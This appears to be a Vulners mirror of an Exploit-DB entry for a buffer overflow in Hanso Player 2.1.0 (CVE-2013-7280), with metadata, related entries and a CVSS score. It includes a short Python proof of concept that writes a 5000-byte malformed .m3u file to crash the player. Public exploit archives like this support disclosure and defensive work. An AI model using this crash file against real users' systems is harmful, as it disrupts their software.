Lucene search
+L

Hanso Player 2.1.0 - '.m3u' Buffer Overflow

🗓️ 01 Mar 2013 00:00:00Reported by metacomType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Buffer Overflow in Hanso Player version 2.1.0, Download from www.hansotools.co

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-7280
1 Mar 201300:00
circl
CVE
CVE-2013-7280
8 Jan 201415:00
cve
Cvelist
CVE-2013-7280
8 Jan 201415:00
cvelist
Exploit DB
Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)
5 Nov 201300:00
exploitdb
NVD
CVE-2013-7280
8 Jan 201415:30
nvd
Prion
Buffer overflow
8 Jan 201415:30
prion
#!/usr/bin/python
# Exploit Title:Buffer Overflow Vulnerability Hanso Player version 2.1.0
# Download link :www.hansotools.com/downloads/hanso-player-setup.exe
# Author: metacom
# RST
# version: 2.1.0
# Category: poc
# Tested on: windows 7 German

f=open("fuzzzzz.m3u","w")
print "Creating expoit."

junk="\x41" * 5000

try:
    f.write(junk)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Apr 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.0577
32